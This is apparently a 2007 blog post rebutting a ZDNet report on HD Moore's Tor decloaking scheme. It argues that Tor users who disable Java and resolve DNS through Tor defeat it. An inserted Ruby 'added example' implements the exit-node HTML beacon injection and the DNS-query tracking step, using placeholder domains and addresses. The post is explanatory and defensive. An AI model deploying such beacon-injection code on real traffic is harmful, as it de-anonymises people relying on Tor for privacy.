Hacker outlines how to expose Tor-users

Wednesday, March 7th, 2007 at 2:14 am.

A technical paper released in February by the University of Colorado at Boulder outlines how to attack Tor using a few malicious servers. A spokesperson for the Tor project was quick to respond, saying that they are aware of the problem and that nothing indicates that such an attack has been launched "in the wild" yet. Yesterday the "respectable" publication ZDNet reported that "Hacker builds tracking system to nab Tor pedophiles". Such tracking has nothing to do with nabbing pedophiles and everything to do with compromising the security of the entire Tor network and all its users. So this article should be very alarming.

However, a close inspection of the "tracking measures" outlined in the article indicates that the supposed "tracking" is no threat at all to a correctly configured Tor user.

Here’s why:

The supposed tracking method that ZDNet's "über-hacker HD Moore" proposes is (quoting the article):

1. Run a patched TOR server. The patches embed a Ruby interpreter into the TOR connection engine and allow arbitrary Ruby scripts to process data before sending it back to the client.

2. When child porn-related keywords are seen (either the Web request, or the response), inject a little extra HTML code into the response going back to the Web browser. This HTML code would connect to my decloaking engine.

3. The decloak engine is based on the following techniques:

Now. 1) Running a patched Tor server is a bad thing and a threat to the network, depending on the patch. This patch, however, as described in 2), would have to run on a Tor exit, and all it does is modify the HTML passed back to the client. On its own that does no tracking; it only means that you get a modified page back. Tor exits tampering with traffic are a very bad thing in themselves (such servers mean you would have to reload the page through another exit if it comes back modified), but the modification alone identifies nobody.

The tracking would be done by the user's browser, triggered by the extra HTML. That could just as easily be done by anyone with a web server, couldn't it? You are reading this page, which means that I control the HTML your browser got. That is pretty much the same situation as a patched Tor exit handing you "tracking" HTML, isn't it? So the "Tor server patch" described would, at best, only be somewhat annoying.

But wait. Is this kind of HTML tracking possible?

Let's take a close look at the ZDNet story regarding the actual tracking described.

a) A unique identifier is created to track this user.

b) The browser is asked to resolve a unique host name, containing the identifier, that is part of a special domain hosted on my server. I run a modified DNS server that updates a database with the address from which the DNS request is received. The goal of this step is to determine the ISP of the user.

As anyone who knows how Tor is used is aware, a correctly configured Tor client resolves hostnames through the Tor network: the browser hands the hostname to Tor (through Privoxy, or over SOCKS4a/SOCKS5 with remote DNS) instead of asking the local resolver. Thus b) would determine that someone used the patched Tor exit and then resolved the identifier domain through another Tor exit. This does not reveal anything about the user's ISP; it reveals that the same user is (still) using the Tor network. This information is useful because..? Well, you already know the person in question is using the Tor network, don't you? How else would someone have fetched the page through Tor?

The one caveat is a misconfigured client. A browser that uses Tor as a plain SOCKS4 proxy, or any application that resolves names itself before connecting, sends the lookup to the ISP's resolver in the clear, and that DNS leak is exactly what step b) is built to catch. That is a client configuration mistake the Tor setup documentation warns about (it is the reason Privoxy is recommended in front of Tor), not a weakness in Tor itself.
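
To make step b) concrete, here is an added example in Ruby (the language HD Moore's patch embedded, though this is not his code and not from the original post): the exit-side injection of a per-user beacon hostname, the DNS query the client's resolver would send for it, and the tracking server's view of where that query arrives from. It goes one step beyond the text by also classifying the case the post discounts, a client that leaks DNS to its ISP. The domain decloak.example, the keyword list, the page text and the exit-node addresses are all constructed; a real tracking server would compare the source address against a published Tor exit list.

```ruby
# Added example: a simulation of the DNS-beacon part of the scheme described
# above (steps 1-2 and a-b). Illustrative code, not the original post's and
# not HD Moore's patch. The domain decloak.example, the page text, the
# keyword list and the exit-node addresses are all constructed.
require 'securerandom'

BEACON_DOMAIN = 'decloak.example'.freeze                       # hypothetical tracking domain
KNOWN_EXITS   = %w[192.0.2.10 192.0.2.11 198.51.100.7].freeze  # constructed stand-in for a
                                                               # published Tor exit list

# --- Exit side (steps 1-2): tag a matching response with a unique hostname ---
# Returns [html, beacon_host]; beacon_host is nil when nothing was injected.
def inject_beacon(html, keywords, id = SecureRandom.hex(8))
  body = html.downcase
  return [html, nil] unless keywords.any? { |k| body.include?(k.downcase) }
  host = "#{id}.#{BEACON_DOMAIN}"
  tag  = %(<img src="http://#{host}/b.gif" width="1" height="1" alt="">)
  tagged = html.sub(%r{</body>}i) { |m| tag + m }
  tagged = html + tag if tagged == html          # no </body>: append instead
  [tagged, host]
end

# --- What the client's resolver emits: a minimal RFC 1035 A query ---
def build_dns_query(name, txid = rand(0..0xffff))
  header = [txid, 0x0100, 1, 0, 0, 0].pack('n6')   # flags: RD set; QDCOUNT=1
  qname  = name.split('.').map { |l| [l.bytesize, l].pack('Ca*') }.join + "\x00"
  header + qname + [1, 1].pack('nn')               # QTYPE=A, QCLASS=IN
end

# --- Tracking-server side: pull the QNAME out of a query, nil if malformed ---
def parse_qname(packet)
  return nil if packet.bytesize < 17               # header + root label + QTYPE/QCLASS
  pos, labels = 12, []
  loop do
    len = packet.getbyte(pos)
    return nil if len.nil? || len > 63             # truncated, or a compression pointer
    pos += 1
    break if len.zero?
    return nil if pos + len > packet.bytesize
    labels << packet.byteslice(pos, len)
    pos += len
  end
  labels.join('.')
end

# Step b) as seen by the tracking server: record the ID and where the query
# came from. If the source is a Tor exit, all you learn is "this user is on
# Tor". A query from any other address is a DNS leak by a misconfigured client.
def classify_beacon_query(packet, src_ip)
  qname = parse_qname(packet)
  return nil unless qname && qname.end_with?(".#{BEACON_DOMAIN}")
  id = qname.delete_suffix(".#{BEACON_DOMAIN}")
  verdict = KNOWN_EXITS.include?(src_ip) ? :via_tor : :dns_leak
  { id: id, src: src_ip, verdict: verdict }
end

# End-to-end walk-through on a constructed page.
def demo
  page = '<html><body><p>constructed page text containing keyword</p></body></html>'
  _tagged, host = inject_beacon(page, %w[keyword])
  query = build_dns_query(host)
  configured = classify_beacon_query(query, '192.0.2.11')    # name went through Tor
  leaking    = classify_beacon_query(query, '203.0.113.77')  # ISP resolver asked directly
  [configured[:verdict], leaking[:verdict]]                  # => [:via_tor, :dns_leak]
end

puts demo.inspect if $PROGRAM_NAME == __FILE__
```

Note what the :via_tor branch gives the operator: the ID plus the address of some Tor exit, i.e. nothing beyond "this person is using Tor", which is the point of the paragraph above. The :dns_leak branch is the configuration mistake to test your own client for (a browser using Tor as a plain SOCKS4 proxy, or resolving names itself) before relying on that argument.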

And then there’s this:

c) The browser is asked to load a Java applet. This applet uses two different techniques to obtain information about the user.

d) The first method uses the Java API to determine the local IP address of the user. This value is then passed back to the JavaScript code in the Web HTML snippet hosting the applet. The goal of this step is to get the real *internal* IP address of the user.

e) The second method involves the applet sending a raw DNS packet, directly to my server. Since this is UDP, it does not pass through TOR, and since it is sent by the Java code, it does not go through the ISP. This packet contains the unique identifier and if received, gives away the real *external* IP of the user. The goal of this step is to get the address of the user’s NAT gateway.

Now. This information is true. Java does allow tracking of Tor users, and it does so regardless of whether anyone runs a patched Tor server: any website with a Java applet can track users who browse with Java enabled, because an applet can open raw TCP and UDP sockets back to the host it was loaded from, and those sockets bypass the browser's proxy settings entirely. This is in every Tor how-to: you have to disable Java when you use Tor. You should also disable JavaScript and ActiveX.

So. Tracking is still possible if you have Java enabled in your browser, and every Tor user who has even glanced at the documentation knows this. Yes, c), d) and e) work on a Tor user who hasn't read the fine manual, but they simply won't work on Tor users who have disabled Java, which by my estimate is about 99.99% of them.

Oh, and there is a claim f) after e):

f) At this point, my server is able to determine the internal address of the user, the external address from which they access the internet, and the ISP they use to provide DNS resolution, as well as the IP address they come from through the TOR network. This information, along with the unique tracking ID, allows me to identify a specific workstation within an organization or residence.

Again, true for the 0.01% of Tor users who browse with Java enabled.

I don’t.

So, at this point, Mr. Moore, your server still has no idea what my address is, which ISP I use for DNS resolution, or which IP address I came through the Tor network from; and since your server has none of this information except a tracking ID, which is useless on its own, you still can't identify me, my organization or my residence.

In bullet summary:

  • Yes, you should disable Java when you're using Tor (and on the Internet in general), because a Java applet can open raw sockets that do not honour the web browser's proxy settings.
  • Make sure your browser resolves hostnames through Tor (Privoxy, or SOCKS4a/SOCKS5 with remote DNS); a client that leaks DNS lookups to its ISP is exactly what step b) is built to catch.
  • The supposed tracking system does work for the 0.01% of Tor users who never bothered to read the documentation.

Tags: Tor, security, anonymity, internet
